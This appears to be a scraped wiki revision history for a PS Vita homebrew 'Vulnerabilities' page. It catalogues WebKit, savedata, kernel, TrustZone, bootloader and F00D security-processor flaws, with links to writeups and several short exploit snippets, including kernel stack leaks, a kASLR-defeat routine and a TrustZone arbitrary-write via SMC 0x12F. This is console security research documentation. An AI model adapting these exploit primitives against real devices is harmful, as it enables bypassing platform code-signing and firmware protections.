[[https://www.lolhax.org/2016/11/02/the-vision-behind-taihen/ Davee's writeup]]<br />
<br />
=== HENkaku ===<br />
<br />
On 29/07/2016 HENkaku was released: http://henkaku.xyz/<br />
<br />
HENkaku enables homebrew by patching out signature checks (works similar to [[SceKernelModulemgr#Module_decryption_and_signature_checks]]). HENkaku uses two kernel vulnerabilities: [[Vulnerabilities#Heap_use-after-free_in_sceNetSyscallIoctl]] and [[Vulnerabilities#sceIoDevctl_does_not_clear_stack_buffer]] and a usermode webkit vulnerability. HENkaku only works on firmware 3.60, however the kernel vulnerabilities are present in all firmware versions up to and including 3.60.<br />
<br />
=== Rejuvenate ===<br />
<br />
On 14/06/2015, Rejuvenate, which was the first public exploit that allowed to run unsigned usermode code, was released. http://yifan.lu/2015/06/14/rejuvenate-native-homebrew-for-psvita/<br />
<br />
=== Secure Kernel ===<br />
<br />
It was no surprise that crypto processes were not handled by the kernel (such was the case for previous Sony consoles). Libraries that deal with encrypted/signed content ([[Self Loading|SELF loading]], [[PUP]] unpacking, etc) all make calls to the [[Secure World]]. The hypothesis was that like many large manufacturers at the time, secure world was used for cryptography and security tasks. Getting access to the secure kernel was even harder than non-secure kernel because there was much less exposure and much less information. However, with a vulnerability that abused some lightly documented features of the ARM architecture, the secure kernel was dumped on 06/09/2014, a little less than a year after owning kernel. Unfortunately, almost immediately, the team found that secure kernel was a red herring. There was no keys or any sensitive information in secure world (Sony was wiser here than most other ARM device makers), but the sole task of the secure kernel was to communicate with an external processor which the team named [[F00D Processor]] because of the <code>e_machine</code> field of the ELF headers.<br />
<br />
=== Kernel ===<br />
<br />
For about a year research was focused on getting kernel code execution. Through some ingenuity and a lot of luck, on 27/08/2013 the first kernel exploit on the Vita was realized. The vulnerability was an integer overflow leading to a heap overflow and a misconfiguration that allowed a small portion of kernel heap memory to be leaked. The exploit and tools were completed on 01/09/2013 and for the first time, kernel memory was revealed. After a week of dumping the large kernel codebase (there were many factors that made it a slow process), work begin in parallel to reverse the system and find more vulnerabilities.<br />
<br />
=== Userland ===<br />
<br />
On 18/08/2012, a vulnerability was discovered in [[PSM]] that allowed both for memory to be dumped and code to be executed.<ref>[https://www.youtube.com/watch?v=w1GICNXTOhM&list=UUNIviKniCqbDShbAvldEOtA First memory dump]</ref> [[UVLoader]] was developed and in a couple of weeks, the first working native code homebrew ran on 12/09/2012. Although the source for UVLoader was released in anticipation for excitement in the homebrew community, there was no serious response from developers. Unfortunately, Sony used the source for UVLoader to secure the system in later updates and make userland code loading a much harder reality.<br />
<br />
=== ROP ===<br />
<br />
In early 2012, the first ROP exploit was achieved through the [[Web Browser]]. Memory dumps of the browser were obtained through a disclosed WebKit vulnerability that was not patched because Sony did not use the most up-to-date WebKit version. The same vulnerability allowed allowed ROP code execution. [[ROPTool]] was written to make creation and testing of ROP payloads easy.<br />
<br />
=== PSP ===<br />
<br />
Molecule has done some work on PSP in the past. Initial reversing of the [[PSP Emulator]] was done by members of Molecule including the first flash0 dump that opened the door for all future PSP emulator hacks.<br />
<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11480Vulnerabilities2019-09-02T01:27:09Z<p>Xyz: /* Heap buffer overflow in update_service_sm */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevetheless, a set of tricks allow to install and use PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can so be installed using PKG Installer, or BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developper license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
public class AppMain<br />
{<br />
[SecurityCritical]<br />
public static void Escalate (IAsyncResult result)<br />
{<br />
Console.WriteLine("Should be SecurityCritical");<br />
IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
}<br />
<br />
public static void Main (string[] args)<br />
{<br />
Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
Network.AuthGetTicket();<br />
NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
while (!result.IsCompleted)<br />
{<br />
Console.WriteLine("waiting...");<br />
}<br />
Console.WriteLine("Completed!");<br />
}<br />
}<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it is using a gamesave exploit. The reason for that is after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since this was the only way we could get more syscalls (than the browser uses), as they are randomized at boot and only assigned to syscall slots if any user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games does not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is because games that were developed with an SDK 2.60 and lower were compiled as a statically linked executable, thus their loading address is always the same, namely 0x81000000, and they cannot be relocated to an other region. They also don't have stack protection enabled by default, which means that if we can stack smash in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process, you just fuzz gamesaves by writing random stuff at random locations until you get a crash (best bet is extending strings and hope that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
Bittersmile game found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug relies on the parser of the bittersmile game. The gamesave is actually a text file and the game reads it line by line and copies them to a list of buffers. However it doesn't validate the length, thus if we put the delimiter \n far away such that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer is on stack, we can make it overwrite the return address and straightly execute our ROP chain. However it is on the data section, but luckily for us, the content after the buffer is actually the list that contained destinations for other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line to wherever we want and therefore enable us an arbitrary write primitive.<br />
<br />
Not patchable. Bittersmile game requires minimal FW ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn’t sanitize check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that Sony can securize PSVita's store as much as they want, we will always be able to activate til PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate PSVita, we only have to spoof firmware version for bypassing FW Update popup, and we also have to spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can overflow syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When calling syscall, calling with invalid syscall id will end the svc interrupt without clearing vaddr in r0's syscall table.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some interesting functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get upto 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
// kernel stack leak to outbuf<br />
sceIoDevctl("sdstor0:", 5, "xmc-lp-ign-userext", 0x14, &outbuf, 0x3FF);<br />
<br />
// check if our data was actually written to outbuf<br />
hex_dump("kstack", (unsigned char*) outbuf, 0x400);<br />
</source><br />
<br />
Fixed in 3.61.<br />
<br />
=== Heap use-after-free in sceNetSyscallIoctl ===<br />
<br />
Discovered on 2016-04-05 by Molecule Team. Implemented in HENkaku by Molecule Team.<br />
<br />
See [https://blog.xyz.is/2016/vita-netps-ioctl.html xyz's writeup].<br />
<br />
sceNetSyscallIoctl is declared as <code>int sceNetSyscallIoctl(int s, unsigned flags, void *umem)</code>. When <code>memsz = (flags_ >> 16) & 0x1FFF</code> is in range (0x80; 0x1000], it will use SceNetPs custom malloc to allocate a buffer of that size on the heap.<br />
<br />
However, the second argument to malloc is 0, meaning that when not enough memory is available instead of returning NULL, it unlocks the global SceNetPs mutex and waits on a semaphore.<br />
<br />
Then, while malloc is waiting, another thread can free the socket sceNetSyscallIoctl is operating on, causing a use-after-free condition.<br />
<br />
When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched on 3.68 or on FWs just before. These exploits are not usable on retail/testkit because the used functions are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (xor'ed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be xored or SCE_NGS_ERROR_INVALID will be returned by the sceNgsRackGetRequiredMemorySize function.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME allows to get the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 //value specific for 1.692<br />
<br />
SceInt32 gRet = 0;<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
SceInt32 ret = 0;<br />
<br />
SceNgsRackDescription rackDesc;<br />
rackDesc.nChannelsPerVoice = 1;<br />
rackDesc.nVoices = 1;<br />
rackDesc.nMaxPatchesPerInput = 0;<br />
rackDesc.nPatchesPerOutput = 1;<br />
<br />
unsigned int voiceDef[0x400];<br />
memset(voiceDef, 0x00, 0x400);<br />
voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
voiceDef[2]= 0x40;<br />
voiceDef[3]= 0x40;<br />
sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
sceKernelDelayThread(2*1000*1000);<br />
<br />
for(unsigned int addr=DEVCTL_STACK_FRAME; addr < 0x3000000; addr+= 0x1000)<br />
{ <br />
rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
gRet = ret;<br />
if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
continue;<br />
else return (addr-DEVCTL_STACK_FRAME); <br />
}<br />
return 0xFFFFFFF;<br />
} <br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The 2 following bugs are exploited when using a negative length memcpy in order to use OOB without having a too big copied buffer nor triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, the addition with dst will yield a value smaller than dst due to an integer overflow and as a consequence, the comparison later in the code will result in false, no matter if it is a signed or unsigned comparison, and thus it believes that there are less than 32 bytes to copy.<br />
<br />
==== memcpy length comparizon as signed integer ====<br />
<br />
At some point in memcpy function, the length is compared as signed integer. Hence a negative length will simply bypass the copy loop.<br />
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution we can mod eMMC MBR to change block size. However at this time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way so he just left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A 1.80 TrustZone modules imports/exports list is available [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and having the SMC copy this data somewhere into TrustZone memory (e.g.: SMC table). This results in TrustZone level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
memcpy((void *)0x00400028, src, 8);<br />
<br />
uintptr_t sm_handle = 0x00560000 >> 1;<br />
uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
asm volatile(<br />
"mov r0, %0\n\t"<br />
"mov r1, %1\n\t"<br />
"mov r12, #0x12F\n\t"<br />
"smc #0\n\t"<br />
: : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
);<br />
}<br />
</source><br />
<br />
To achieve code execution, it is needed to set dst to the SMC table address in order to plant 2 pointers (8=2*4 bytes).<br />
<br />
Patched somewhere around after 1.80 before 2.10.<br />
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) To be disclosed.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) f00d secure_kernel module loading does not check source address and therefore provides an oracle allowing for memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code> which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory) and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table that all points to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it almost requires no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style of glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11479Vulnerabilities2019-08-31T15:42:09Z<p>Xyz: /* Secure World (TrustZone) */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
